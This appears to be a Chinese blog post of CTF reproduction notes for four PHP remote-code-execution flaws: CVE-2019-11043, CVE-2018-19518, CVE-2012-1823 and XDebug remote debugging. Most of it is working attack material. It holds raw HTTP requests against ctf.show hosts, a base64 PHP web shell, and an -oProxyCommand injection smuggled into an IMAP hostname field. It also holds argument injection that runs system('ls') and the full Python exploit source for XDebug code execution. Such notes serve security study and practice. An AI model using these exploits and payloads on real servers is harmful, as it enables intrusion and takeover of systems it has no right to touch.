PHP

1.漏洞复现

CVE-2019-11043

影响范围:PHP-FPM + Nginx特定配置 + PHP 7.1-7.3

nginx.conf 配置:

location ~ [^/]\.php(/|$) {
 ...
 fastcgi_split_path_info ^(.+?\.php)(/.*)$;
 fastcgi_param PATH_INFO $fastcgi_path_info;
 fastcgi_pass   php:9000;
 ...
}

phuip-fpizdam工具安装:

安 golang 的时候最后几个访问不到用 apt install golang --fix-missing,还是有点问题也没事

apt install golang
git clone https://github.com/neex/phuip-fpizdam.git
go env -w GOPROXY=https://goproxy.cn
cd phuip-fpizdam
go get -v && go build

漏洞利用:

./phuip-fpizdam URL/index.php

有回显命令执行(没反应就再访问一遍):URL/index?a=命令

CVE-2018-19518

影响范围:PHP 5.6.38 开启imap扩展(用于邮件收发)

准备Payload:

<?php echo `$_GET[1]`;?> base64:PD9waHAgZWNobyBgJF9HRVRbMV1gOz8+

echo "PD9waHAgZWNobyBgJF9HRVRbMV1gOz8+" | base64 -d > /var/www/html/shell.php 再base64+URL编码(好像不能有 + 和 / )

邮箱登录,抓包改包无回显命令执行

POST / HTTP/1.1
Host: 284527d7-240d-4cf9-ad55-8a85881aeb93.challenge.ctf.show
Content-Length: 159
Content-Type: application/x-www-form-urlencoded
Connection: close

hostname=x+-oProxyCommand%3decho%09最终编码结果|base64%09-d|sh}

CVE-2012-1823

影响范围:php-cgi + php < 5.3.12、php < 5.4.2

爆源码:/index.php?-s

任意文件包含:

POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: 604da5e8-97f9-4974-9b09-017a09a9f49d.challenge.ctf.show
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Connection: close

<?php system('ls');?>

XDebug 远程调试RCE

影响范围:开启 XDebug 扩展,并配置php.ini

xdebug.remote_connect_back = 1
xdebug.remote_enable = 1

使用exp.py进行RCE(攻击机要能被回连)

#!/usr/bin/env python3
import re
import sys
import time
import requests
import argparse
import socket
import base64
import binascii
from concurrent.futures import ThreadPoolExecutor


pool = ThreadPoolExecutor(1)
session = requests.session()
session.headers = {
    'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
}

def recv_xml(sock):
    blocks = []
    data = b''
    while True:
        try:
            data = data + sock.recv(1024)
        except socket.error as e:
            break
        if not data:
            break

        while data:
            eop = data.find(b'\x00')
            if eop < 0:
                break
            blocks.append(data[:eop])
            data = data[eop+1:]

        if len(blocks) >= 4:
            break
    
    return blocks[3]


def trigger(url):
    time.sleep(2)
    try:
        session.get(url + '?XDEBUG_SESSION_START=phpstorm', timeout=0.1)
    except:
        pass


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='XDebug remote debug code execution.')
    parser.add_argument('-c', '--code', required=True, help='the code you want to execute.')
    parser.add_argument('-t', '--target', required=True, help='target url.')
    parser.add_argument('-l', '--listen', default=9000, type=int, help='local port')
    args = parser.parse_args()
    
    ip_port = ('0.0.0.0', args.listen)
    sk = socket.socket()
    sk.settimeout(10)
    sk.bind(ip_port)
    sk.listen(5)

    pool.submit(trigger, args.target)
    conn, addr = sk.accept()
    conn.sendall(b''.join([b'eval -i 1 -- ', base64.b64encode(args.code.encode()), b'\x00']))

    data = recv_xml(conn)
    print('[+] Recieve data: ' + data.decode())
    g = re.search(rb'<\!\[CDATA\[([a-z0-9=\./\+]+)\]\]>', data, re.I)
    if not g:
        print('[-] No result...')
        sys.exit(0)

    data = g.group(1)

    try:
        print('[+] Result: ' + base64.b64decode(data).decode())
    except binascii.Error:
        print('[-] May be not string result...')
EXP源码
python exp.py -t http://xxx:8080/index.php -c 'shell_exec('id');'
posted @ 2023-01-30 20:53  Hacker&Cat  阅读(47)  评论(0编辑  收藏  举报